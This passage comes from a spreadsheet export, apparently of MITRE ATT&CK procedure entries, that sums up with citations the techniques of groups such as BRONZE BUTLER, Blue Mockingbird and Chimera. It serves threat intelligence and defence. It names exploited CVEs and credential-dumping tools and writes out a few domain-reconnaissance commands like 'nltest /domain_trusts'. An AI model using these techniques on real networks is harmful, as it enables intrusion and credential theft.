    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE 2021-44228).(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted and failed to run Bash commands on a Windows host by passing them to &lt;code&gt;cmd /C&lt;/code&gt;.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has compressed and encrypted data prior to exfiltration.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used large groups of compromised machines for use as proxy nodes.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has acquired dynamic DNS services for use in the targeting of intended victims.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has collected data from a compromised network.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used watering hole attacks to gain access.(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has been observed using SQL injection to gain access to systems.(Citation: Novetta-Axiom)(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has been known to dump credentials.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used spear phishing to initially compromise victims.(Citation: Cisco Group 72)(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has targeted victims with remote administration tools including RDP.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used RDP during operations.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used steganography to hide its C2 communications.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used digital certificates to deliver malware.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used previously compromised administrative accounts to escalate privileges.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used VPS hosting providers in targeting of intended victims.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has registered a variety of domains to host malicious payloads and for C2.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[BITTER](https://attack.mitre.org/groups/G1002) has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.(Citation: Cisco Talos Bitter Bangladesh May 2022) </t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used DDNS for C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has encrypted their C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has exploited CVE-2021-1732 for privilege escalation.(Citation: DBAPPSecurity BITTER zero-day Feb 2021)(Citation: Microsoft CVE-2021-1732 Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BITTER](https://attack.mitre.org/groups/G1002) has downloaded additional malware and tools onto a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) </t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has attempted to lure victims into opening malicious attachments delivered via spearphishing.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has disguised malware as a Windows Security update service.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used TCP for C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used a RAR SFX dropper to deliver malware.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used scheduled tasks for persistence and execution.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has sent spearphishing emails with a malicious RTF document or Excel spreadsheet.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has obtained tools such as PuTTY for use in their operations.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has registered domains to stage payloads.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used HTTP POST requests for C2.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used [at](https://attack.mitre.org/software/S0110) to register a scheduled task to execute malware during lateral movement.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloader code has included "0" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used legitimate applications to side-load malicious DLLs.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exfiltrated files stolen from local systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exfiltrated files stolen from file shares.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060)'s MSGET downloader uses a dead drop resolver to access malicious payloads.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloads encoded payloads and decodes them on the victim.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has incorporated code into several tools that attempts to terminate anti-virus processes.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used &lt;code&gt;net user /domain&lt;/code&gt; to identify account information.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) compromised three Japanese websites using a Flash exploit to perform watering hole attacks.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>The [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) uploader or malware the uploader uses &lt;code&gt;command&lt;/code&gt; to delete the RAR archives after they have been exfiltrated.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used various tools to download files, including DGet (a similar tool to wget).(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used various tools (such as Mimikatz and WCE) to perform credential dumping.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has masked executables with document file icons including Word and Adobe PDF.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used PowerShell for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a batch script that adds a Registry Run key to establish malware persistence.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) typically use &lt;code&gt;ping&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039) to enumerate systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used Right-to-Left Override to deceive victims into executing several strains of malware.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used [schtasks](https://attack.mitre.org/software/S0111) to register a scheduled task to execute malware during lateral movement.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used tools to enumerate software installed on an infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Several [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) tools encode data with base64 when posting it to a C2 server.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used steganography in multiple operations to conceal malicious payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used TROJ_GETVERSION to discover system services.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used &lt;code&gt;net time&lt;/code&gt; to check the local time on a target system.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has placed malware on file shares and given it the same name as legitimate documents on the share.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has obtained and used open-source tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [gsecdump](https://attack.mitre.org/software/S0008), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) malware has used HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used batch scripts and the command-line interface for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has executed DLL search order hijacking.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has also exploited mis-configured Plesk servers.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has downloaded additional files and tools onto a compromised host.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has copied files of interest to the main drive's recycle bin.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obtained and used leaked malware, including DoublePulsar, EternalBlue, EternalRocks, and EternalSynergy, in its operations.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has disguised their backdoor droppers with naming conventions designed to blend into normal operations.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has dropped implants in folders named for legitimate software.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obfuscated tools and malware it uses with VMProtect.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used an executable to detect removable media, such as USB flash drives.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used NetCat and PortQry  to enumerate network connections and display the status of related TCP and UDP ports.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used web shells to establish an initial foothold and for lateral movement within a victim's system.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BlackOasis](https://attack.mitre.org/groups/G0063)'s first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used stolen code-signing certificates for its malicious payloads.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[BlackTech](https://attack.mitre.org/groups/G0098) has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used valid, stolen digital certificates for some of their malware and tools.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious documents to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)(Citation: NTT Security Flagpro new December 2021)	 </t>
  </si>
  <si>
    <t xml:space="preserve">[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious links to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)	 </t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used built-in API functions.(Citation: IronNet BlackTech Oct 2021)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used the SNScan tool to find other potential targets on victim networks.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used Putty for remote access.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware.(Citation: TrendMicro BlackTech June 2017)(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with links to cloud services to deliver malware.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) has obtained and used tools such as Putty, SNScan, and [PsExec](https://attack.mitre.org/software/S0029) for its operations.(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used JuicyPotato to abuse the &lt;code&gt;SeImpersonate&lt;/code&gt; token privilege to escalate from web application pool accounts to NT Authority\SYSTEM.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Mimikatz to retrieve credentials from LSASS memory.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Registry modifications to specify a DLL payload.(Citation: RedCanary Mockingbird May 2020)	</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obfuscated the wallet address in the payload binary.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used PowerShell reverse TCP shells to issue interactive commands over a network connection.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used frp, ssf, and Venom to establish SOCKS proxy connections.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.(Citation: RedCanary Mockingbird May 2020)	</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used XMRIG to mine cryptocurrency on victim systems.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Explorer to manually copy malicious files to remote hosts over SMB.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Scheduled Tasks to establish persistence on local and remote hosts.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the "wercplsupport" service.(Citation: RedCanary Mockingbird May 2020)	</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has collected hardware details for the victim's system, including CPU and memory information.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used batch script files to automate execution and deployment of payloads.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe to set environment variables.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has made their XMRIG payloads persistent as a Windows Service.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has used a VBScript named "ggldr" that uses Google Apps Script, Sheets, and Forms services for C2.(Citation: Forcepoint Carbanak Google C2)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) may use [netsh](https://attack.mitre.org/software/S0108) to add local firewall rule exceptions.(Citation: Group-IB Anunak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has copied legitimate service names to use for malicious services.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has named malware "svchost.exe," which is the name of the Windows shared service host program.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.(Citation: Group-IB Anunak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) installs VNC server software that executes through rundll32.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) has obtained and used open-source tools such as [PsExec](https://attack.mitre.org/software/S0029) and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) malware installs itself as a service to provide persistence and SYSTEM privileges.(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used custom DLLs for continuous retrieval of data from memory.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;type \\&lt;hostname&gt;\c$\Users\&lt;username&gt;\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*&lt;/code&gt; for bookmark discovery.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has cleared event logs on compromised hosts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used credential stuffing against victim's remote services to obtain valid accounts.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has collected credentials for the target organization from previous breaches for use in brute force attacks.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used side loading to place malicious DLLs in memory.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) to encapsulate C2 in DNS traffic.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has collected data of interest from network shares.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has has used &lt;code&gt;net user /dom&lt;/code&gt; and &lt;code&gt;net user Administrator&lt;/code&gt; to enumerate domain accounts including administrator accounts.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has used compromised domain accounts to gain access to the target environment.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Chimera](https://attack.mitre.org/groups/G0114)'s malware has altered the NTLM authentication program on domain controllers to allow [Chimera](https://attack.mitre.org/groups/G0114) to login without a valid credential.(Citation: Cycraft Chimera April 2020)	</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) has &lt;code&gt;nltest /domain_trusts&lt;/code&gt; to identify domain trust relationships.(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
